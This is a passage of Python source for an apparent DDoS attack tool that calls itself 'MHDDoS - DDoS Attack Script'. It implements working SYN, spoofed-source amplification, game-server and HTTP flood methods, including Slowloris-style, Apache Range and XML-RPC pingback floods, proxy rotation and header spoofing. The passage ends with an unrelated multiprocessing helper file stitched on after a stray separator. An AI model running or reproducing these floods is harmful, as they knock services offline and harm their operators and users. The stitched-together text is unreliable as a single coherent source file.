Tools.safe_close(s)
def SYN(self) -> None:
payload = self._genrate_syn()
s = None
with suppress(Exception), socket(AF_INET, SOCK_RAW, IPPROTO_TCP) as s:
s.setsockopt(IPPROTO_IP, IP_HDRINCL, 1)
while Tools.sendto(s, payload, self._target):
continue
Tools.safe_close(s)
def AMP(self) -> None:
payload = next(self._amp_payloads)
s = None
with suppress(Exception), socket(AF_INET, SOCK_RAW,
IPPROTO_UDP) as s:
s.setsockopt(IPPROTO_IP, IP_HDRINCL, 1)
while Tools.sendto(s, *payload):
continue
Tools.safe_close(s)
def MCBOT(self) -> None:
s = None
with suppress(Exception), self.open_connection(AF_INET, SOCK_STREAM) as s:
Tools.send(s, Minecraft.handshake_forwarded(self._target,
47,
2,
ProxyTools.Random.rand_ipv4(),
uuid4()))
Tools.send(s, Minecraft.login(f"MHDDoS_{ProxyTools.Random.rand_str(5)}"))
sleep(1.5)
c = 360
while Tools.send(s, Minecraft.keepalive(randint(1111111, 9999999))):
c -= 1
if c:
continue
c = 360
Tools.send(s, Minecraft.chat(Tools.randchr(100)))
Tools.safe_close(s)
def VSE(self) -> None:
global BYTES_SEND, REQUESTS_SENT
payload = (b'\xff\xff\xff\xff\x54\x53\x6f\x75\x72\x63\x65\x20\x45\x6e\x67\x69\x6e\x65'
b'\x20\x51\x75\x65\x72\x79\x00')
with socket(AF_INET, SOCK_DGRAM) as s:
while Tools.sendto(s, payload, self._target):
continue
Tools.safe_close(s)
def FIVEM(self) -> None:
global BYTES_SEND, REQUESTS_SENT
payload = b'\xff\xff\xff\xffgetinfo xxx\x00\x00\x00'
with socket(AF_INET, SOCK_DGRAM) as s:
while Tools.sendto(s, payload, self._target):
continue
Tools.safe_close(s)
def TS3(self) -> None:
global BYTES_SEND, REQUESTS_SENT
payload = b'\x05\xca\x7f\x16\x9c\x11\xf9\x89\x00\x00\x00\x00\x02'
with socket(AF_INET, SOCK_DGRAM) as s:
while Tools.sendto(s, payload, self._target):
continue
Tools.safe_close(s)
def MCPE(self) -> None:
global BYTES_SEND, REQUESTS_SENT
payload = (b'\x61\x74\x6f\x6d\x20\x64\x61\x74\x61\x20\x6f\x6e\x74\x6f\x70\x20\x6d\x79\x20\x6f'
b'\x77\x6e\x20\x61\x73\x73\x20\x61\x6d\x70\x2f\x74\x72\x69\x70\x68\x65\x6e\x74\x20'
b'\x69\x73\x20\x6d\x79\x20\x64\x69\x63\x6b\x20\x61\x6e\x64\x20\x62\x61\x6c\x6c'
b'\x73')
with socket(AF_INET, SOCK_DGRAM) as s:
while Tools.sendto(s, payload, self._target):
continue
Tools.safe_close(s)
def _genrate_syn(self) -> bytes:
ip: IP = IP()
ip.set_ip_src(getMyIPAddress())
ip.set_ip_dst(self._target[0])
tcp: TCP = TCP()
tcp.set_SYN()
tcp.set_th_dport(self._target[1])
tcp.set_th_sport(randint(1, 65535))
ip.contains(tcp)
return ip.get_packet()
def _generate_amp(self):
payloads = []
for ref in self._ref:
ip: IP = IP()
ip.set_ip_src(self._target[0])
ip.set_ip_dst(ref)
ud: UDP = UDP()
ud.set_uh_dport(self._amp_payload[1])
ud.set_uh_sport(self._target[1])
ud.contains(Data(self._amp_payload[0]))
ip.contains(ud)
payloads.append((ip.get_packet(), (ref, self._amp_payload[1])))
return payloads
# noinspection PyBroadException,PyUnusedLocal
class HttpFlood(Thread):
_proxies: List[Proxy] = None
_payload: str
_defaultpayload: Any
_req_type: str
_useragents: List[str]
_referers: List[str]
_target: URL
_method: str
_rpc: int
_synevent: Any
SENT_FLOOD: Any
def __init__(self,
target: URL,
host: str,
method: str = "GET",
rpc: int = 1,
synevent: Event = None,
useragents: Set[str] = None,
referers: Set[str] = None,
proxies: Set[Proxy] = None) -> None:
Thread.__init__(self, daemon=True)
self.SENT_FLOOD = None
self._synevent = synevent
self._rpc = rpc
self._method = method
self._target = target
self._host = host
self._raw_target = (self._host, (self._target.port or 80))
if not self._target.host[len(self._target.host) - 1].isdigit():
self._raw_target = (self._host, (self._target.port or 80))
if not referers:
referers: List[str] = [
"https://www.facebook.com/l.php?u=https://www.facebook.com/l.php?u=",
",https://www.facebook.com/sharer/sharer.php?u=https://www.facebook.com/sharer"
"/sharer.php?u=",
",https://drive.google.com/viewerng/viewer?url=",
",https://www.google.com/translate?u="
]
self._referers = list(referers)
if proxies:
self._proxies = list(proxies)
if not useragents:
useragents: List[str] = [
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 '
'Safari/537.36',
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 '
'Safari/537.36',
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 '
'Safari/537.36',
'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0'
]
self._useragents = list(useragents)
self._req_type = self.getMethodType(method)
self._defaultpayload = "%s %s HTTP/%s\r\n" % (self._req_type,
target.raw_path_qs, randchoice(['1.0', '1.1', '1.2']))
self._payload = (self._defaultpayload +
'Accept-Encoding: gzip, deflate, br\r\n'
'Accept-Language: en-US,en;q=0.9\r\n'
'Cache-Control: max-age=0\r\n'
'Connection: Keep-Alive\r\n'
'Sec-Fetch-Dest: document\r\n'
'Sec-Fetch-Mode: navigate\r\n'
'Sec-Fetch-Site: none\r\n'
'Sec-Fetch-User: ?1\r\n'
'Sec-Gpc: 1\r\n'
'Pragma: no-cache\r\n'
'Upgrade-Insecure-Requests: 1\r\n')
def run(self) -> None:
if self._synevent: self._synevent.wait()
self.select(self._method)
while self._synevent.is_set():
self.SENT_FLOOD()
@property
def SpoofIP(self) -> str:
spoof: str = ProxyTools.Random.rand_ipv4()
return ("X-Forwarded-Proto: Http\r\n"
f"X-Forwarded-Host: {self._target.raw_host}, 1.1.1.1\r\n"
f"Via: {spoof}\r\n"
f"Client-IP: {spoof}\r\n"
f'X-Forwarded-For: {spoof}\r\n'
f'Real-IP: {spoof}\r\n')
def generate_payload(self, other: str = None) -> bytes:
return str.encode((self._payload +
"Host: %s\r\n" % self._target.authority +
self.randHeadercontent +
(other if other else "") +
"\r\n"))
def open_connection(self) -> socket:
if self._proxies:
sock = randchoice(self._proxies).open_socket(AF_INET, SOCK_STREAM)
else:
sock = socket(AF_INET, SOCK_STREAM)
sock.setsockopt(IPPROTO_TCP, TCP_NODELAY, 1)
sock.connect(self._raw_target)
if self._target.scheme.lower() == "https":
sock = ctx.wrap_socket(sock,
server_hostname=self._target.host,
server_side=False,
do_handshake_on_connect=True,
suppress_ragged_eofs=True)
return sock
@property
def randHeadercontent(self) -> str:
return (f"User-Agent: {randchoice(self._useragents)}\r\n"
f"Referrer: {randchoice(self._referers)}{parse.quote(self._target.human_repr())}\r\n" +
self.SpoofIP)
@staticmethod
def getMethodType(method: str) -> str:
return "GET" if {method.upper()} & {"CFB", "CFBUAM", "GET", "COOKIE", "OVH", "EVEN",
"DYN", "SLOW", "PPS", "APACHE",
"BOT", } \
else "POST" if {method.upper()} & {"POST", "XMLRPC", "STRESS"} \
else "HEAD" if {method.upper()} & {"GSB", "HEAD"} \
else "REQUESTS"
def POST(self) -> None:
payload: bytes = self.generate_payload(
("Content-Length: 44\r\n"
"X-Requested-With: XMLHttpRequest\r\n"
"Content-Type: application/json\r\n\r\n"
'{"data": %s}') % ProxyTools.Random.rand_str(32))[:-2]
s = None
with suppress(Exception), self.open_connection() as s:
for _ in range(self._rpc):
Tools.send(s, payload)
Tools.safe_close(s)
def STRESS(self) -> None:
payload: bytes = self.generate_payload(
(f"Content-Length: 524\r\n"
"X-Requested-With: XMLHttpRequest\r\n"
"Content-Type: application/json\r\n\r\n"
'{"data": %s}') % ProxyTools.Random.rand_str(512))[:-2]
s = None
with suppress(Exception), self.open_connection() as s:
for _ in range(self._rpc):
Tools.send(s, payload)
Tools.safe_close(s)
def COOKIES(self) -> None:
payload: bytes = self.generate_payload(
"Cookie: _ga=GA%s;"
" _gat=1;"
" __cfduid=dc232334gwdsd23434542342342342475611928;"
" %s=%s\r\n" %
(randint(1000, 99999), ProxyTools.Random.rand_str(6),
ProxyTools.Random.rand_str(32)))
s = None
with suppress(Exception), self.open_connection() as s:
for _ in range(self._rpc):
Tools.send(s, payload)
Tools.safe_close(s)
def APACHE(self) -> None:
payload: bytes = self.generate_payload(
"Range: bytes=0-,%s" % ",".join("5-%d" % i
for i in range(1, 1024)))
s = None
with suppress(Exception), self.open_connection() as s:
for _ in range(self._rpc):
Tools.send(s, payload)
Tools.safe_close(s)
def XMLRPC(self) -> None:
payload: bytes = self.generate_payload(
("Content-Length: 345\r\n"
"X-Requested-With: XMLHttpRequest\r\n"
"Content-Type: application/xml\r\n\r\n"
"<?xml version='1.0' encoding='iso-8859-1'?>"
"<methodCall><methodName>pingback.ping</methodName>"
"<params><param><value><string>%s</string></value>"
"</param><param><value><string>%s</string>"
"</value></param></params></methodCall>") %
(ProxyTools.Random.rand_str(64),
ProxyTools.Random.rand_str(64)))[:-2]
s = None
with suppress(Exception), self.open_connection() as s:
for _ in range(self._rpc):
Tools.send(s, payload)
Tools.safe_close(s)
def PPS(self) -> None:
s = None
with suppress(Exception), self.open_connection() as s:
for _ in range(self._rpc):
Tools.send(s, self._defaultpayload)
Tools.safe_close(s)
def GET(self) -> None:
payload: bytes = self.generate_payload()
s = None
with suppress(Exception), self.open_connection() as s:
for _ in range(self._rpc):
Tools.send(s, payload)
Tools.safe_close(s)
def BOT(self) -> None:
payload: bytes = self.generate_payload()
p1, p2 = str.encode(
"GET /robots.txt HTTP/1.1\r\n"
"Host: %s\r\n" % self._target.raw_authority +
"Connection: Keep-Alive\r\n"
"Accept: text/plain,text/html,*/*\r\n"
"User-Agent: %s\r\n" % randchoice(google_agents) +
"Accept-Encoding: gzip,deflate,br\r\n\r\n"), str.encode(
"GET /sitemap.xml HTTP/1.1\r\n"
"Host: %s\r\n" % self._target.raw_authority +
"Connection: Keep-Alive\r\n"
"Accept: */*\r\n"
"From: googlebot(at)googlebot.com\r\n"
"User-Agent: %s\r\n" % randchoice(google_agents) +
"Accept-Encoding: gzip,deflate,br\r\n"
"If-None-Match: %s-%s\r\n" % (ProxyTools.Random.rand_str(9),
ProxyTools.Random.rand_str(4)) +
"If-Modified-Since: Sun, 26 Set 2099 06:00:00 GMT\r\n\r\n")
s = None
with suppress(Exception), self.open_connection() as s:
Tools.send(s, p1)
Tools.send(s, p2)
for _ in range(self._rpc):
Tools.send(s, payload)
Tools.safe_close(s)
def EVEN(self) -> None:
payload: bytes = self.generate_payload()
s = None
with suppress(Exception), self.open_connection() as s:
while Tools.send(s, payload) and s.recv(1):
continue
Tools.safe_close(s)
def OVH(self) -> None:
payload: bytes = self.generate_payload()
s = None
with suppress(Exception), self.open_connection() as s:
for _ in range(min(self._rpc, 5)):
Tools.send(s, payload)
Tools.safe_close(s)
def CFB(self):
global REQUESTS_SENT, BYTES_SEND
pro = None
if self._proxies:
pro = randchoice(self._proxies)
s = None
with suppress(Exception), create_scraper() as s:
for _ in range(self._rpc):
if pro:
with s.get(self._target.human_repr(),
proxies=pro.asRequest()) as res:
REQUESTS_SENT += 1
BYTES_SEND += Tools.sizeOfRequest(res)
continue
with s.get(self._target.human_repr()) as res:
REQUESTS_SENT += 1
BYTES_SEND += Tools.sizeOfRequest(res)
Tools.safe_close(s)
def CFBUAM(self):
payload: bytes = self.generate_payload()
s = None
with suppress(Exception), self.open_connection() as s:
Tools.send(s, payload)
sleep(5.01)
for _ in range(self._rpc):
Tools.send(s, payload)
Tools.safe_close(s)
def AVB(self):
payload: bytes = self.generate_payload()
s = None
with suppress(Exception), self.open_connection() as s:
for _ in range(self._rpc):
sleep(max(self._rpc / 1000, 1))
Tools.send(s, payload)
Tools.safe_close(s)
def DGB(self):
global REQUESTS_SENT, BYTES_SEND
s = None
with suppress(Exception), create_scraper() as s:
for _ in range(min(self._rpc, 5)):
sleep(min(self._rpc, 5) / 100)
if self._proxies:
pro = randchoice(self._proxies)
with s.get(self._target.human_repr(),
proxies=pro.asRequest()) as res:
REQUESTS_SENT += 1
BYTES_SEND += Tools.sizeOfRequest(res)
continue
with s.get(self._target.human_repr()) as res:
REQUESTS_SENT += 1
BYTES_SEND += Tools.sizeOfRequest(res)
Tools.safe_close(s)
def DYN(self):
payload: str | bytes = str.encode(self._payload +
"Host: %s.%s\r\n" % (ProxyTools.Random.rand_str(6), self._target.authority) +
self.randHeadercontent +
"\r\n")
s = None
with suppress(Exception), self.open_connection() as s:
for _ in range(self._rpc):
Tools.send(s, payload)
Tools.safe_close(s)
def DOWNLOADER(self):
payload: str | bytes = self.generate_payload()
s = None
with suppress(Exception), self.open_connection() as s:
for _ in range(self._rpc):
Tools.send(s, payload)
while 1:
sleep(.01)
data = s.recv(1)
if not data:
break
Tools.send(s, b'0')
Tools.safe_close(s)
def BYPASS(self):
global REQUESTS_SENT, BYTES_SEND
pro = None
if self._proxies:
pro = randchoice(self._proxies)
s = None
with suppress(Exception), Session() as s:
for _ in range(self._rpc):
if pro:
with s.get(self._target.human_repr(),
proxies=pro.asRequest()) as res:
REQUESTS_SENT += 1
BYTES_SEND += Tools.sizeOfRequest(res)
continue
with s.get(self._target.human_repr()) as res:
REQUESTS_SENT += 1
BYTES_SEND += Tools.sizeOfRequest(res)
Tools.safe_close(s)
def GSB(self):
payload = str.encode("%s %s?qs=%s HTTP/1.1\r\n" % (self._req_type,
self._target.raw_path_qs,
ProxyTools.Random.rand_str(6)) +
"Host: %s\r\n" % self._target.authority +
self.randHeadercontent +
'Accept-Encoding: gzip, deflate, br\r\n'
'Accept-Language: en-US,en;q=0.9\r\n'
'Cache-Control: max-age=0\r\n'
'Connection: Keep-Alive\r\n'
'Sec-Fetch-Dest: document\r\n'
'Sec-Fetch-Mode: navigate\r\n'
'Sec-Fetch-Site: none\r\n'
'Sec-Fetch-User: ?1\r\n'
'Sec-Gpc: 1\r\n'
'Pragma: no-cache\r\n'
'Upgrade-Insecure-Requests: 1\r\n\r\n')
s = None
with suppress(Exception), self.open_connection() as s:
for _ in range(self._rpc):
Tools.send(s, payload)
Tools.safe_close(s)
def NULL(self) -> None:
payload: str | bytes = str.encode(self._payload +
"Host: %s\r\n" % self._target.authority +
"User-Agent: null\r\n" +
"Referrer: null\r\n" +
self.SpoofIP + "\r\n")
s = None
with suppress(Exception), self.open_connection() as s:
for _ in range(self._rpc):
Tools.send(s, payload)
Tools.safe_close(s)
def BOMB(self):
pro = randchoice(self._proxies)
run([
f'{Path.home() / "go/bin/bombardier"}',
f'{bombardier_path}',
f'--connections={self._rpc}',
'--http2',
'--method=GET',
'--no-print',
'--timeout=60s',
f'--requests={self._rpc}',
f'--proxy={pro}',
f'{self._target.human_repr()}',
])
def SLOW(self):
payload: bytes = self.generate_payload()
s = None
with suppress(Exception), self.open_connection() as s:
for _ in range(self._rpc):
Tools.send(s, payload)
while Tools.send(s, payload) and s.recv(1):
for i in range(self._rpc):
keep = str.encode("X-a: %d\r\n" % randint(1, 5000))
Tools.send(s, keep)
sleep(self._rpc / 15)
break
Tools.safe_close(s)
def select(self, name: str) -> None:
self.SENT_FLOOD = self.GET
if name == "POST":
self.SENT_FLOOD = self.POST
if name == "CFB":
self.SENT_FLOOD = self.CFB
if name == "CFBUAM":
self.SENT_FLOOD = self.CFBUAM
if name == "XMLRPC":
self.SENT_FLOOD = self.XMLRPC
if name == "BOT":
self.SENT_FLOOD = self.BOT
if name == "APACHE":
self.SENT_FLOOD = self.APACHE
if name == "BYPASS":
self.SENT_FLOOD = self.BYPASS
if name == "OVH":
self.SENT_FLOOD = self.OVH
if name == "AVB":
self.SENT_FLOOD = self.AVB
if name == "STRESS":
self.SENT_FLOOD = self.STRESS
if name == "DYN":
self.SENT_FLOOD = self.DYN
if name == "SLOW":
self.SENT_FLOOD = self.SLOW
if name == "GSB":
self.SENT_FLOOD = self.GSB
if name == "NULL":
self.SENT_FLOOD = self.NULL
if name == "COOKIE":
self.SENT_FLOOD = self.COOKIES
if name == "PPS":
self.SENT_FLOOD = self.PPS
self._defaultpayload = (
self._defaultpayload +
"Host: %s\r\n\r\n" % self._target.authority).encode()
if name == "EVEN": self.SENT_FLOOD = self.EVEN
if name == "DOWNLOADER": self.SENT_FLOOD = self.DOWNLOADER
if name == "BOMB": self.SENT_FLOOD = self.BOMB
class ProxyManager:
@staticmethod
def DownloadFromConfig(cf, Proxy_type: int) -> Set[Proxy]:
providrs = [
provider for provider in cf["proxy-providers"]
if provider["type"] == Proxy_type or Proxy_type == 0
]
logger.info("Downloading Proxies form %d Providers" % len(providrs))
proxes: Set[Proxy] = set()
with ThreadPoolExecutor(len(providrs)) as executor:
future_to_download = {
executor.submit(
ProxyManager.download, provider,
ProxyType.stringToProxyType(str(provider["type"])))
for provider in providrs
}
for future in as_completed(future_to_download):
for pro in future.result():
proxes.add(pro)
return proxes
@staticmethod
def download(provider, proxy_type: ProxyType) -> Set[Proxy]:
logger.debug(
"Downloading Proxies form (URL: %s, Type: %s, Timeout: %d)" %
(provider["url"], proxy_type.name, provider["timeout"]))
proxes: Set[Proxy] = set()
with suppress(TimeoutError, exceptions.ConnectionError,
exceptions.ReadTimeout):
data = get(provider["url"], timeout=provider["timeout"]).text
try:
for proxy in ProxyUtiles.parseAllIPPort(
data.splitlines(), proxy_type):
proxes.add(proxy)
except Exception as e:
logger.error('Download Proxy Error: %s' %
(e.__str__() or e.__repr__()))
return proxes
class ToolsConsole:
METHODS = {"INFO", "TSSRV", "CFIP", "DNS", "PING", "CHECK", "DSTAT"}
@staticmethod
def checkRawSocket():
with suppress(OSError):
with socket(AF_INET, SOCK_RAW, IPPROTO_TCP):
return True
return False
@staticmethod
def runConsole():
cons = "%s@BetterStresser:~#" % gethostname()
while 1:
cmd = input(cons + " ").strip()
if not cmd: continue
if " " in cmd:
cmd, args = cmd.split(" ", 1)
cmd = cmd.upper()
if cmd == "HELP":
print("Tools:" + ", ".join(ToolsConsole.METHODS))
print("Commands: HELP, CLEAR, BACK, EXIT")
continue
if (cmd == "E") or \
(cmd == "EXIT") or \
(cmd == "Q") or \
(cmd == "QUIT") or \
(cmd == "LOGOUT") or \
(cmd == "CLOSE"):
exit(-1)
if cmd == "CLEAR":
print("\033c")
continue
if not {cmd} & ToolsConsole.METHODS:
print("%s command not found" % cmd)
continue
if cmd == "DSTAT":
with suppress(KeyboardInterrupt):
ld = net_io_counters(pernic=False)
while True:
sleep(1)
od = ld
ld = net_io_counters(pernic=False)
t = [(last - now) for now, last in zip(od, ld)]
logger.info(
("Bytes Sended %s\n"
"Bytes Recived %s\n"
"Packets Sended %s\n"
"Packets Recived %s\n"
"ErrIn %s\n"
"ErrOut %s\n"
"DropIn %s\n"
"DropOut %s\n"
"Cpu Usage %s\n"
"Memory %s\n") %
(Tools.humanbytes(t[0]), Tools.humanbytes(t[1]),
Tools.humanformat(t[2]), Tools.humanformat(t[3]),
t[4], t[5], t[6], t[7], str(cpu_percent()) + "%",
str(virtual_memory().percent) + "%"))
if cmd in ["CFIP", "DNS"]:
print("Soon")
continue
if cmd == "CHECK":
while True:
with suppress(Exception):
domain = input(f'{cons}give-me-ipaddress# ')
if not domain: continue
if domain.upper() == "BACK": break
if domain.upper() == "CLEAR":
print("\033c")
continue
if (domain.upper() == "E") or \
(domain.upper() == "EXIT") or \
(domain.upper() == "Q") or \
(domain.upper() == "QUIT") or \
(domain.upper() == "LOGOUT") or \
(domain.upper() == "CLOSE"):
exit(-1)
if "/" not in domain: continue
logger.info("please wait ...")
with get(domain, timeout=20) as r:
logger.info(('status_code: %d\n'
'status: %s') %
(r.status_code, "ONLINE"
if r.status_code <= 500 else "OFFLINE"))
if cmd == "INFO":
while True:
domain = input(f'{cons}give-me-ipaddress# ')
if not domain: continue
if domain.upper() == "BACK": break
if domain.upper() == "CLEAR":
print("\033c")
continue
if (domain.upper() == "E") or \
(domain.upper() == "EXIT") or \
(domain.upper() == "Q") or \
(domain.upper() == "QUIT") or \
(domain.upper() == "LOGOUT") or \
(domain.upper() == "CLOSE"):
exit(-1)
domain = domain.replace('https://',
'').replace('http://', '')
if "/" in domain: domain = domain.split("/")[0]
print('please wait ...', end="\r")
info = ToolsConsole.info(domain)
if not info["success"]:
print("Error!")
continue
logger.info(("Country: %s\n"
"City: %s\n"
"Org: %s\n"
"Isp: %s\n"
"Region: %s\n") %
(info["country"], info["city"], info["org"],
info["isp"], info["region"]))
if cmd == "TSSRV":
while True:
domain = input(f'{cons}give-me-domain# ')
if not domain: continue
if domain.upper() == "BACK": break
if domain.upper() == "CLEAR":
print("\033c")
continue
if (domain.upper() == "E") or \
(domain.upper() == "EXIT") or \
(domain.upper() == "Q") or \
(domain.upper() == "QUIT") or \
(domain.upper() == "LOGOUT") or \
(domain.upper() == "CLOSE"):
exit(-1)
domain = domain.replace('https://',
'').replace('http://', '')
if "/" in domain: domain = domain.split("/")[0]
print('please wait ...', end="\r")
info = ToolsConsole.ts_srv(domain)
logger.info("TCP: %s\n" % (info['_tsdns._tcp.']))
logger.info("UDP: %s\n" % (info['_ts3._udp.']))
if cmd == "PING":
while True:
domain = input(f'{cons}give-me-ipaddress# ')
if not domain: continue
if domain.upper() == "BACK": break
if domain.upper() == "CLEAR":
print("\033c")
if (domain.upper() == "E") or \
(domain.upper() == "EXIT") or \
(domain.upper() == "Q") or \
(domain.upper() == "QUIT") or \
(domain.upper() == "LOGOUT") or \
(domain.upper() == "CLOSE"):
exit(-1)
domain = domain.replace('https://',
'').replace('http://', '')
if "/" in domain: domain = domain.split("/")[0]
logger.info("please wait ...")
r = ping(domain, count=5, interval=0.2)
logger.info(('Address: %s\n'
'Ping: %d\n'
'Aceepted Packets: %d/%d\n'
'status: %s\n') %
(r.address, r.avg_rtt, r.packets_received,
r.packets_sent,
"ONLINE" if r.is_alive else "OFFLINE"))
@staticmethod
def stop():
print('All Attacks has been Stopped !')
for proc in process_iter():
if proc.name() == "python.exe":
proc.kill()
@staticmethod
def usage():
print((
'* MHDDoS - DDoS Attack Script With %d Methods\n'
'Note: If the Proxy list is empty, the attack will run without proxies\n'
' If the Proxy file doesn\'t exist, the script will download proxies and check them.\n'
' Proxy Type 0 = All in config.json\n'
' SocksTypes:\n'
' - 6 = RANDOM\n'
' - 5 = SOCKS5\n'
' - 4 = SOCKS4\n'
' - 1 = HTTP\n'
' - 0 = ALL\n'
' > Methods:\n'
' - Layer4\n'
' | %s | %d Methods\n'
' - Layer7\n'
' | %s | %d Methods\n'
' - Tools\n'
' | %s | %d Methods\n'
' - Others\n'
' | %s | %d Methods\n'
' - All %d Methods\n'
'\n'
'Example:\n'
' L7: python3 %s <method> <url> <socks_type> <threads> <proxylist> <rpc> <duration> <debug=optional>\n'
' L4: python3 %s <method> <ip:port> <threads> <duration>\n'
' L4 Proxied: python3 %s <method> <ip:port> <threads> <duration> <socks_type> <proxylist>\n'
' L4 Amplification: python3 %s <method> <ip:port> <threads> <duration> <reflector file (only use with'
' Amplification)>\n') %
(len(Methods.ALL_METHODS) + 3 + len(ToolsConsole.METHODS),
", ".join(Methods.LAYER4_METHODS), len(Methods.LAYER4_METHODS),
", ".join(Methods.LAYER7_METHODS), len(Methods.LAYER7_METHODS),
", ".join(ToolsConsole.METHODS), len(ToolsConsole.METHODS),
", ".join(["TOOLS", "HELP", "STOP"]), 3,
len(Methods.ALL_METHODS) + 3 + len(ToolsConsole.METHODS),
argv[0], argv[0], argv[0], argv[0]))
# noinspection PyBroadException
@staticmethod
def ts_srv(domain):
records = ['_ts3._udp.', '_tsdns._tcp.']
DnsResolver = resolver.Resolver()
DnsResolver.timeout = 1
DnsResolver.lifetime = 1
Info = {}
for rec in records:
try:
srv_records = resolver.resolve(rec + domain, 'SRV')
for srv in srv_records:
Info[rec] = str(srv.target).rstrip('.') + ':' + str(
srv.port)
except:
Info[rec] = 'Not found'
return Info
# noinspection PyUnreachableCode
@staticmethod
def info(domain):
with suppress(Exception), get("https://ipwhois.app/json/%s/" % domain) as s:
return s.json()
return {"success": False}
def handleProxyList(con, proxy_li, proxy_ty, url=None):
if proxy_ty not in {4, 5, 1, 0, 6}:
exit("Socks Type Not Found [4, 5, 1, 0, 6]")
if proxy_ty == 6:
proxy_ty = randchoice([4, 5, 1])
if not proxy_li.exists():
logger.warning("The file doesn't exist, creating files and downloading proxies.")
proxy_li.parent.mkdir(parents=True, exist_ok=True)
with proxy_li.open("w") as wr:
Proxies: Set[Proxy] = ProxyManager.DownloadFromConfig(con, proxy_ty)
logger.info(
f"{len(Proxies):,} Proxies are getting checked, this may take awhile!"
)
Proxies = ProxyChecker.checkAll(
Proxies, timeout=1, threads=threads,
url=url.human_repr() if url else "http://httpbin.org/get",
)
if not Proxies:
exit(
"Proxy Check failed, Your network may be the problem"
" | The target may not be available."
)
stringBuilder = ""
for proxy in Proxies:
stringBuilder += (proxy.__str__() + "\n")
wr.write(stringBuilder)
proxies = ProxyUtiles.readFromFile(proxy_li)
if proxies:
logger.info(f"Proxy Count: {len(proxies):,}")
else:
logger.info(
"Empty Proxy File, running flood witout proxy")
proxies = None
return proxies
if __name__ == '__main__':
with open(__dir__ / "config.json") as f:
con = load(f)
with suppress(KeyboardInterrupt):
with suppress(IndexError):
one = argv[1].upper()
if one == "HELP":
raise IndexError()
if one == "TOOLS":
ToolsConsole.runConsole()
if one == "STOP":
ToolsConsole.stop()
method = one
host = None
url = None
event = Event()
event.clear()
target = None
urlraw = argv[2].strip()
if not urlraw.startswith("http"):
urlraw = "http://" + urlraw
if method not in Methods.ALL_METHODS:
exit("Method Not Found %s" %
", ".join(Methods.ALL_METHODS))
if method in Methods.LAYER7_METHODS:
url = URL(urlraw)
host = url.host
try:
host = gethostbyname(url.host)
except Exception as e:
exit('Cannot resolve hostname ', url.host, e)
threads = int(argv[4])
rpc = int(argv[6])
timer = int(argv[7])
proxy_ty = int(argv[3].strip())
proxy_li = Path(__dir__ / "files/proxies/" /
argv[5].strip())
useragent_li = Path(__dir__ / "files/useragent.txt")
referers_li = Path(__dir__ / "files/referers.txt")
bombardier_path = Path(__dir__ / "go/bin/bombardier")
proxies: Any = set()
if method == "BOMB":
assert (
bombardier_path.exists()
or bombardier_path.with_suffix('.exe').exists()
), (
"Install bombardier: "
"https://github.com/MHProDev/MHDDoS/wiki/BOMB-method"
)
if len(argv) == 9:
logger.setLevel("DEBUG")
if not useragent_li.exists():
exit("The Useragent file doesn't exist ")
if not referers_li.exists():
exit("The Referer file doesn't exist ")
uagents = set(a.strip()
for a in useragent_li.open("r+").readlines())
referers = set(a.strip()
for a in referers_li.open("r+").readlines())
if not uagents: exit("Empty Useragent File ")
if not referers: exit("Empty Referer File ")
if threads > 1000:
logger.warning("Thread is higher than 1000")
if rpc > 100:
logger.warning(
"RPC (Request Pre Connection) is higher than 100")
proxies = handleProxyList(con, proxy_li, proxy_ty, url)
for _ in range(threads):
HttpFlood(url, host, method, rpc, event, uagents,
referers, proxies).start()
if method in Methods.LAYER4_METHODS:
target = URL(urlraw)
port = target.port
target = target.host
try:
target = gethostbyname(target)
except Exception as e:
exit('Cannot resolve hostname ', url.host, e)
if port > 65535 or port < 1:
exit("Invalid Port [Min: 1 / Max: 65535] ")
if method in {"NTP", "DNS", "RDP", "CHAR", "MEM", "CLDAP", "ARD", "SYN"} and \
not ToolsConsole.checkRawSocket():
exit("Cannot Create Raw Socket")
threads = int(argv[3])
timer = int(argv[4])
proxies = None
ref = None
if not port:
logger.warning("Port Not Selected, Set To Default: 80")
port = 80
if len(argv) >= 6:
argfive = argv[5].strip()
if argfive:
refl_li = Path(__dir__ / "files" / argfive)
if method in {"NTP", "DNS", "RDP", "CHAR", "MEM", "CLDAP", "ARD"}:
if not refl_li.exists():
exit("The reflector file doesn't exist")
if len(argv) == 7:
logger.setLevel("DEBUG")
ref = set(a.strip()
for a in ProxyTools.Patterns.IP.findall(
refl_li.open("r+").read()))
if not ref: exit("Empty Reflector File ")
elif argfive.isdigit() and len(argv) >= 7:
if len(argv) == 8:
logger.setLevel("DEBUG")
proxy_ty = int(argfive)
proxy_li = Path(__dir__ / "files/proxies" / argv[6].strip())
proxies = handleProxyList(con, proxy_li, proxy_ty)
if method not in {"MINECRAFT", "MCBOT", "TCP", "CPS", "CONNECTION"}:
exit("this method cannot use for layer4 proxy")
else:
logger.setLevel("DEBUG")
for _ in range(threads):
Layer4((target, port), ref, method, event,
proxies).start()
logger.info(
"Attack Started to %s with %s method for %s seconds, threads: %d!"
% (target or url.human_repr(), method, timer, threads))
event.set()
ts = time()
while time() < ts + timer:
logger.debug('PPS: %s, BPS: %s / %d%%' %
(Tools.humanformat(int(REQUESTS_SENT)),
Tools.humanbytes(int(BYTES_SEND)),
round((time() - ts) / timer * 100, 2)))
REQUESTS_SENT.set(0)
BYTES_SEND.set(0)
sleep(1)
event.clear()
exit()
ToolsConsole.usage()
|
actor_runner.py
|
"""Helper class to run an actor on child process."""
import logging
import multiprocessing as mp
from functools import partial
from queue import Queue
from typing import Callable
class ActorRunner:
"""Actor runner. To start actors' sampling task you need to not only init Runner object but also call `start()` to kick gRPC client initialization and start the main task.
Args:
n_processes: Number of child processes,
run_actor_func: Function to init an actor.
"""
def __init__(self,
n_processes: int,
run_actor_func: Callable[[int, Queue], None],
logger: logging.Logger = logging.getLogger(__name__)):
self.n_processes = n_processes
self.logger = logger
# init actor subprocesses
self.ps = []
self.start_queue = []
for i in range(n_processes):
queue = mp.Queue(maxsize=1)
p = mp.Process(target=partial(run_actor_func, process_index=i, start_queue=queue), daemon=True)
p.start()
self.ps.append(p)
self.start_queue.append(queue)
